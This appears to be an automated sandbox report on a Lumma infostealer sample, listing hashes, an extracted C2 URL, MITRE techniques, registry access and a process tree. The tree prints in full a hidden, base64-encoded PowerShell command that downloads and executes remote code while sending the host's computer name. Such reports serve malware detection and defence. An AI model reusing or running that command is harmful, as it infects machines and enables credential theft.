lumma | 183c6aa694124103e3896ee7b71175f4a81d9533218617cb80d60d9307b53c90

Analysis

max time kernel
141s
max time network
155s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
21-11-2024 19:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

install.exe
Size

136KB
MD5

fca89c62d6ea9f979b3a8d21ee2c4f55
SHA1

bd77809998b5cfef93e3c34af3ddb8292f549d44
SHA256

6b069e5b450898615e709275bc0a53b529f171301a603093bdc17ebd784e0e34
SHA512

f1f1f30d0c07c343d9709dd4a6405751de678886703bd59f2d72751f3d470ca88389b3ce3ba5966282e6f60ae68f13de722e885f4bd1bfae2aad60323edf7df0
SSDEEP

1536:xZ2FWSNhd/4131iO08SKKAP7wBwp8wZtE:T2ddQ131i1pKJP7w2p

Score

10^/10

lumma discovery execution stealer

Malware Config

Extracted

Family

lumma

https://quotedjizwe.cyou/api

Signatures

Lumma Stealer, LummaC
Lumma or LummaC is an infostealer written in C++ first seen in August 2022.
stealer lumma
Lumma family
lumma
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

27 3948 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exe

pid process

3948 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

EASteamProxy.exeEASteamProxy.exe

pid process

4256 EASteamProxy.exe
396 EASteamProxy.exe

flow	pid	process
27	3948	powershell.exe

Loads dropped DLL 18 IoCs

Processes:

EASteamProxy.exeEASteamProxy.exe

pid	process
4256	EASteamProxy.exe
4256	EASteamProxy.exe
4256	EASteamProxy.exe
4256	EASteamProxy.exe
4256	EASteamProxy.exe
4256	EASteamProxy.exe
4256	EASteamProxy.exe
4256	EASteamProxy.exe
4256	EASteamProxy.exe
396	EASteamProxy.exe
396	EASteamProxy.exe
396	EASteamProxy.exe
396	EASteamProxy.exe
396	EASteamProxy.exe
396	EASteamProxy.exe
396	EASteamProxy.exe
396	EASteamProxy.exe
396	EASteamProxy.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

18 pastebin.com
17 pastebin.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

EASteamProxy.exe

description pid process target process

PID 396 set thread context of 3136 396 EASteamProxy.exe cmd.exe

flow	ioc
18	pastebin.com
17	pastebin.com

description	pid	process	target process
PID 396 set thread context of 3136	396	EASteamProxy.exe	cmd.exe

System Location Discovery: System Language Discovery 1 TTPs 31 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

powershell.exeRdrCEF.exeRdrCEF.exeRdrCEF.exechcp.comchcp.comcmd.execmd.exejavaw.execmd.exeWMIC.exeexplorer.execmd.exemore.comRdrCEF.exemore.comWMIC.execmd.exechcp.comWMIC.exeRdrCEF.exeexplorer.exeAcroRd32.exechcp.comcmd.exeRdrCEF.exeinstall.execmd.exeRdrCEF.exechcp.commore.com

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	more.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	more.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	more.com

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

Processes:

explorer.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings explorer.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	explorer.exe

Suspicious behavior: EnumeratesProcesses 27 IoCs

Processes:

powershell.exeEASteamProxy.exeAcroRd32.exeEASteamProxy.execmd.exe

pid	process
3948	powershell.exe
3948	powershell.exe
4256	EASteamProxy.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
396	EASteamProxy.exe
396	EASteamProxy.exe
3136	cmd.exe
3136	cmd.exe

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

EASteamProxy.execmd.exe

pid process

396 EASteamProxy.exe
3136 cmd.exe

pid	process
396	EASteamProxy.exe
3136	cmd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exeWMIC.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	456	WMIC.exe
Token: SeSecurityPrivilege	456	WMIC.exe
Token: SeTakeOwnershipPrivilege	456	WMIC.exe
Token: SeLoadDriverPrivilege	456	WMIC.exe
Token: SeSystemProfilePrivilege	456	WMIC.exe
Token: SeSystemtimePrivilege	456	WMIC.exe
Token: SeProfSingleProcessPrivilege	456	WMIC.exe
Token: SeIncBasePriorityPrivilege	456	WMIC.exe
Token: SeCreatePagefilePrivilege	456	WMIC.exe
Token: SeBackupPrivilege	456	WMIC.exe
Token: SeRestorePrivilege	456	WMIC.exe
Token: SeShutdownPrivilege	456	WMIC.exe
Token: SeDebugPrivilege	456	WMIC.exe
Token: SeSystemEnvironmentPrivilege	456	WMIC.exe
Token: SeRemoteShutdownPrivilege	456	WMIC.exe
Token: SeUndockPrivilege	456	WMIC.exe
Token: SeManageVolumePrivilege	456	WMIC.exe
Token: 33	456	WMIC.exe
Token: 34	456	WMIC.exe
Token: 35	456	WMIC.exe
Token: 36	456	WMIC.exe
Token: SeIncreaseQuotaPrivilege	456	WMIC.exe
Token: SeSecurityPrivilege	456	WMIC.exe
Token: SeTakeOwnershipPrivilege	456	WMIC.exe
Token: SeLoadDriverPrivilege	456	WMIC.exe
Token: SeSystemProfilePrivilege	456	WMIC.exe
Token: SeSystemtimePrivilege	456	WMIC.exe
Token: SeProfSingleProcessPrivilege	456	WMIC.exe
Token: SeIncBasePriorityPrivilege	456	WMIC.exe
Token: SeCreatePagefilePrivilege	456	WMIC.exe
Token: SeBackupPrivilege	456	WMIC.exe
Token: SeRestorePrivilege	456	WMIC.exe
Token: SeShutdownPrivilege	456	WMIC.exe
Token: SeDebugPrivilege	456	WMIC.exe
Token: SeSystemEnvironmentPrivilege	456	WMIC.exe
Token: SeRemoteShutdownPrivilege	456	WMIC.exe
Token: SeUndockPrivilege	456	WMIC.exe
Token: SeManageVolumePrivilege	456	WMIC.exe
Token: 33	456	WMIC.exe
Token: 34	456	WMIC.exe
Token: 35	456	WMIC.exe
Token: 36	456	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4684	WMIC.exe
Token: SeSecurityPrivilege	4684	WMIC.exe
Token: SeTakeOwnershipPrivilege	4684	WMIC.exe
Token: SeLoadDriverPrivilege	4684	WMIC.exe
Token: SeSystemProfilePrivilege	4684	WMIC.exe
Token: SeSystemtimePrivilege	4684	WMIC.exe
Token: SeProfSingleProcessPrivilege	4684	WMIC.exe
Token: SeIncBasePriorityPrivilege	4684	WMIC.exe
Token: SeCreatePagefilePrivilege	4684	WMIC.exe
Token: SeBackupPrivilege	4684	WMIC.exe
Token: SeRestorePrivilege	4684	WMIC.exe
Token: SeShutdownPrivilege	4684	WMIC.exe
Token: SeDebugPrivilege	4684	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4684	WMIC.exe
Token: SeRemoteShutdownPrivilege	4684	WMIC.exe
Token: SeUndockPrivilege	4684	WMIC.exe
Token: SeManageVolumePrivilege	4684	WMIC.exe
Token: 33	4684	WMIC.exe
Token: 34	4684	WMIC.exe
Token: 35	4684	WMIC.exe
Token: 36	4684	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4684	WMIC.exe

Suspicious use of FindShellTrayWindow 1 IoCs

Processes:

AcroRd32.exe

pid process

4884 AcroRd32.exe
Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

javaw.exeAcroRd32.exe

pid process

1484 javaw.exe
1484 javaw.exe
4884 AcroRd32.exe
4884 AcroRd32.exe
4884 AcroRd32.exe
4884 AcroRd32.exe
4884 AcroRd32.exe

pid	process
4884	AcroRd32.exe

pid	process
1484	javaw.exe
1484	javaw.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe
4884	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

install.exejavaw.execmd.execmd.execmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 4824 wrote to memory of 1484	4824	install.exe	javaw.exe
PID 4824 wrote to memory of 1484	4824	install.exe	javaw.exe
PID 4824 wrote to memory of 1484	4824	install.exe	javaw.exe
PID 1484 wrote to memory of 1808	1484	javaw.exe	cmd.exe
PID 1484 wrote to memory of 1808	1484	javaw.exe	cmd.exe
PID 1484 wrote to memory of 1808	1484	javaw.exe	cmd.exe
PID 1808 wrote to memory of 232	1808	cmd.exe	chcp.com
PID 1808 wrote to memory of 232	1808	cmd.exe	chcp.com
PID 1808 wrote to memory of 232	1808	cmd.exe	chcp.com
PID 1808 wrote to memory of 1168	1808	cmd.exe	reg.exe
PID 1808 wrote to memory of 1168	1808	cmd.exe	reg.exe
PID 1484 wrote to memory of 1160	1484	javaw.exe	cmd.exe
PID 1484 wrote to memory of 1160	1484	javaw.exe	cmd.exe
PID 1484 wrote to memory of 1160	1484	javaw.exe	cmd.exe
PID 1160 wrote to memory of 2444	1160	cmd.exe	chcp.com
PID 1160 wrote to memory of 2444	1160	cmd.exe	chcp.com
PID 1160 wrote to memory of 2444	1160	cmd.exe	chcp.com
PID 1160 wrote to memory of 456	1160	cmd.exe	WMIC.exe
PID 1160 wrote to memory of 456	1160	cmd.exe	WMIC.exe
PID 1160 wrote to memory of 456	1160	cmd.exe	WMIC.exe
PID 1160 wrote to memory of 1500	1160	cmd.exe	more.com
PID 1160 wrote to memory of 1500	1160	cmd.exe	more.com
PID 1160 wrote to memory of 1500	1160	cmd.exe	more.com
PID 1484 wrote to memory of 2116	1484	javaw.exe	cmd.exe
PID 1484 wrote to memory of 2116	1484	javaw.exe	cmd.exe
PID 1484 wrote to memory of 2116	1484	javaw.exe	cmd.exe
PID 2116 wrote to memory of 3248	2116	cmd.exe	chcp.com
PID 2116 wrote to memory of 3248	2116	cmd.exe	chcp.com
PID 2116 wrote to memory of 3248	2116	cmd.exe	chcp.com
PID 2116 wrote to memory of 4684	2116	cmd.exe	WMIC.exe
PID 2116 wrote to memory of 4684	2116	cmd.exe	WMIC.exe
PID 2116 wrote to memory of 4684	2116	cmd.exe	WMIC.exe
PID 2116 wrote to memory of 5008	2116	cmd.exe	more.com
PID 2116 wrote to memory of 5008	2116	cmd.exe	more.com
PID 2116 wrote to memory of 5008	2116	cmd.exe	more.com
PID 1484 wrote to memory of 4556	1484	javaw.exe	cmd.exe
PID 1484 wrote to memory of 4556	1484	javaw.exe	cmd.exe
PID 1484 wrote to memory of 4556	1484	javaw.exe	cmd.exe
PID 4556 wrote to memory of 1276	4556	cmd.exe	chcp.com
PID 4556 wrote to memory of 1276	4556	cmd.exe	chcp.com
PID 4556 wrote to memory of 1276	4556	cmd.exe	chcp.com
PID 4556 wrote to memory of 4412	4556	cmd.exe	WMIC.exe
PID 4556 wrote to memory of 4412	4556	cmd.exe	WMIC.exe
PID 4556 wrote to memory of 4412	4556	cmd.exe	WMIC.exe
PID 4556 wrote to memory of 3520	4556	cmd.exe	more.com
PID 4556 wrote to memory of 3520	4556	cmd.exe	more.com
PID 4556 wrote to memory of 3520	4556	cmd.exe	more.com
PID 1484 wrote to memory of 1292	1484	javaw.exe	cmd.exe
PID 1484 wrote to memory of 1292	1484	javaw.exe	cmd.exe
PID 1484 wrote to memory of 1292	1484	javaw.exe	cmd.exe
PID 1292 wrote to memory of 4720	1292	cmd.exe	chcp.com
PID 1292 wrote to memory of 4720	1292	cmd.exe	chcp.com
PID 1292 wrote to memory of 4720	1292	cmd.exe	chcp.com
PID 1292 wrote to memory of 432	1292	cmd.exe	reg.exe
PID 1292 wrote to memory of 432	1292	cmd.exe	reg.exe
PID 1484 wrote to memory of 3948	1484	javaw.exe	powershell.exe
PID 1484 wrote to memory of 3948	1484	javaw.exe	powershell.exe
PID 1484 wrote to memory of 3948	1484	javaw.exe	powershell.exe
PID 1484 wrote to memory of 3944	1484	javaw.exe	cmd.exe
PID 1484 wrote to memory of 3944	1484	javaw.exe	cmd.exe
PID 1484 wrote to memory of 3944	1484	javaw.exe	cmd.exe
PID 3944 wrote to memory of 4256	3944	cmd.exe	EASteamProxy.exe
PID 3944 wrote to memory of 4256	3944	cmd.exe	EASteamProxy.exe
PID 1484 wrote to memory of 2984	1484	javaw.exe	explorer.exe

C:\Users\Admin\AppData\Local\Temp\install.exe
"C:\Users\Admin\AppData\Local\Temp\install.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4824
- C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe
  "C:\Users\Admin\AppData\Local\Temp\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "lib\.;lib\..;lib\asm-all.jar;lib\dn-compiled-module.jar;lib\dn-php-sdk.jar;lib\gson.jar;lib\jphp-app-framework.jar;lib\jphp-core.jar;lib\jphp-desktop-ext.jar;lib\jphp-gui-ext.jar;lib\jphp-json-ext.jar;lib\jphp-runtime.jar;lib\jphp-xml-ext.jar;lib\jphp-zend-ext.jar;lib\jphp-zip-ext.jar;lib\slf4j-api.jar;lib\slf4j-simple.jar;lib\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:1484
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1808
  - - C:\Windows\SysWOW64\chcp.com
      C:\Windows\System32\chcp.com 65001
      4⤵
      System Location Discovery: System Language Discovery
      PID:232
  - - C:\Windows\system32\reg.exe
      C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"
      4⤵
      PID:1168
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1160
  - - C:\Windows\SysWOW64\chcp.com
      C:\Windows\System32\chcp.com 866
      4⤵
      System Location Discovery: System Language Discovery
      PID:2444
  - - C:\Windows\SysWOW64\wbem\WMIC.exe
      C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:456
  - - C:\Windows\SysWOW64\more.com
      C:\Windows\System32\more.com
      4⤵
      System Location Discovery: System Language Discovery
      PID:1500
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2116
  - - C:\Windows\SysWOW64\chcp.com
      C:\Windows\System32\chcp.com 866
      4⤵
      System Location Discovery: System Language Discovery
      PID:3248
  - - C:\Windows\SysWOW64\wbem\WMIC.exe
      C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of AdjustPrivilegeToken
      PID:4684
  - - C:\Windows\SysWOW64\more.com
      C:\Windows\System32\more.com
      4⤵
      System Location Discovery: System Language Discovery
      PID:5008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4556
  - - C:\Windows\SysWOW64\chcp.com
      C:\Windows\System32\chcp.com 866
      4⤵
      System Location Discovery: System Language Discovery
      PID:1276
  - - C:\Windows\SysWOW64\wbem\WMIC.exe
      C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List
      4⤵
      System Location Discovery: System Language Discovery
      PID:4412
  - - C:\Windows\SysWOW64\more.com
      C:\Windows\System32\more.com
      4⤵
      System Location Discovery: System Language Discovery
      PID:3520
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1292
  - - C:\Windows\SysWOW64\chcp.com
      C:\Windows\System32\chcp.com 65001
      4⤵
      System Location Discovery: System Language Discovery
      PID:4720
  - - C:\Windows\system32\reg.exe
      C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"
      4⤵
      PID:432
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('DQokcj0naHR0cDovL2NhdHNpLm5ldC9pbmNhbGwucGhwP2NvbXBOYW1lPScrJGVudjpjb21wdXRlcm5hbWU7IFtuZXQuU2VydmljRXBPaU50bUFuYWdlUl06OnNFQ3VyaVRZcFJPVG9jT2wgPSBbbkVULnNlQ1VSSVR5cFJPVG9jb0xUWXBlXTo6VGxzMTI7ICR0dHAgPSBpd3IgJHIgLVVzZUJhc2ljUGFyc2luZyAtVXNlckFnZW50ICdNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjEpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS84MS4wLjQ0NC4xNDMgU2FmYXJpLzUzNy4zNic7IGlleCAkdHRwLkNvbnRlbnQ7')); Invoke-Expression $script}"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:3948
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c "cd /d "C:\Users\Admin\AppData\Local\Temp/191f843d1ac627868b67dcc433ed7b83/" && (for %F in (*.exe) do start "" "%F")"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3944
  - - C:\Users\Admin\AppData\Local\Temp\191f843d1ac627868b67dcc433ed7b83\EASteamProxy.exe
      "EASteamProxy.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:4256
    - - C:\Users\Admin\AppData\Roaming\Serverdownload\EASteamProxy.exe
        
        C:\Users\Admin\AppData\Roaming\Serverdownload\EASteamProxy.exe
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:396
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:3136
        
        C:\Windows\SysWOW64\explorer.exe
        
        C:\Windows\SysWOW64\explorer.exe
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3296
- - C:\Windows\SysWOW64\explorer.exe
    explorer C:\Users\Admin\AppData\Local\Temp\978b988ed9297fbe19d9d517093324fd.pdf
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2984

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Modifies registry class
PID:388
- C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
  "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\978b988ed9297fbe19d9d517093324fd.pdf"
  2⤵
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Modifies Internet Explorer settings
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:4884
- - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
    "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
    3⤵
    - System Location Discovery: System Language Discovery
    PID:1696
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=gpu-process --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --gpu-preferences=GAAAAAAAAAAAB4AAAQAAAAAAAAAAAGAA --use-gl=swiftshader-webgl --gpu-vendor-id=0x1234 --gpu-device-id=0x1111 --gpu-driver-vendor="Google Inc." --gpu-driver-version=3.3.0.2 --gpu-driver-date=2017/04/07 --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --service-request-channel-token=1E3CD67FA2E7993405D41B070B763C01 --mojo-platform-channel-handle=1776 --allow-no-sandbox-job --ignored=" --type=renderer " /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      PID:2280
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
      "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --type=renderer --disable-browser-side-navigation --disable-gpu-compositing --service-pipe-token=24167A2E8BCC2DF6C67A2329D932945B --lang=en-US --disable-pack-loading --lang=en-US --log-file="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\debug.log" --log-severity=disable --product-version="ReaderServices/19.10.20064 Chrome/64.0.3282.119" --enable-pinch --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --enable-gpu-async-worker-context --content-image-texture-target=0,0,3553;0,1,3553;0,2,3553;0,3,3553;0,4,3553;0,5,3553;0,6,3553;0,7,3553;0,8,3553;0,9,3553;0,10,3553;0,11,3553;0,12,3553;0,13,3553;0,14,3553;0,15,3553;0,16,3553;0,17,3553;0,18,3553;1,0,3553;1,1,3553;1,2,3553;1,3,3553;1,4,3553;1,5,3553;1,6,3553;1,7,3553;1,8,3553;1,9,3553;1,10,3553;1,11,3553;1,12,3553;1,13,3553;1,14,3553;1,15,3553;1,16,3553;1,17,3553;1,18,3553;2,0,3553;2,1,3553;2,2,3553;2,3,3553;2,4,3553;2,5,3553;2,6,3553;2,7,3553;2,8,3553;2,9,3553;2,10,3553;2,11,3553;2,12,3553;2,13,3553;2,14,3553;2,15,3553;2,16,3553;2,17,3553;2,18,3553;3,0,3553;3,1,3553;3,2,3553;3,3,3553;3,4,3553;3,5,3553;3,6,3553;3,7,3553;3,8,3553;3,9,3553;3,10,3553;3,11,3553;3,12,3553;3,13,3553;3,14,3553;3,15,3553;3,16,3553;3,17,3553;3,18,3553;4,0,3553;4,1,3553;4,2,3553;4,3,3553;4,4,3553;4,5,3553;4,6,3553;4,7,3553;4,8,3553;4,9,3553;4,10,3553;4,11,3553;4,12,3553;4,13,3553;4,14,3553;4,15,3553;4,16,3553;4,17,3553;4,18,3553;5,0,3553;5,1,3553;5,2,3553;5,3,3553;5,4,3553;5,5,3553;5,6,3553;5,7,3553;5,8,3553;5,9,3553;5,10,3553;5,11,3553;5,12,3553;5,13,3553;5,14,3553;5,15,3553;5,16,3553;5,17,3553;5,18,3553;6,0,3553;6,1,3553;6,2,3553;6,3,3553;6,4,3553;6,5,3553;6,6,3553;6,7,3553;6,8,3553;6,9,3553;6,10,3553;6,11,3553;6,12,3553;6,13,3553;6,14,3553;6,15,3553;6,16,3553;6,17,3553;6,18,3553 --disable-accelerated-video-decode --service-request-channel-token=24167A2E8BCC2DF6C67A2329D932945B --renderer-client-id=2 --mojo-platform-channel-handle=1768 --allow-no-sandbox-job /prefetch:1
      4⤵
      System Location Discovery: System Language Discovery
      PID:3604
  - - C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe
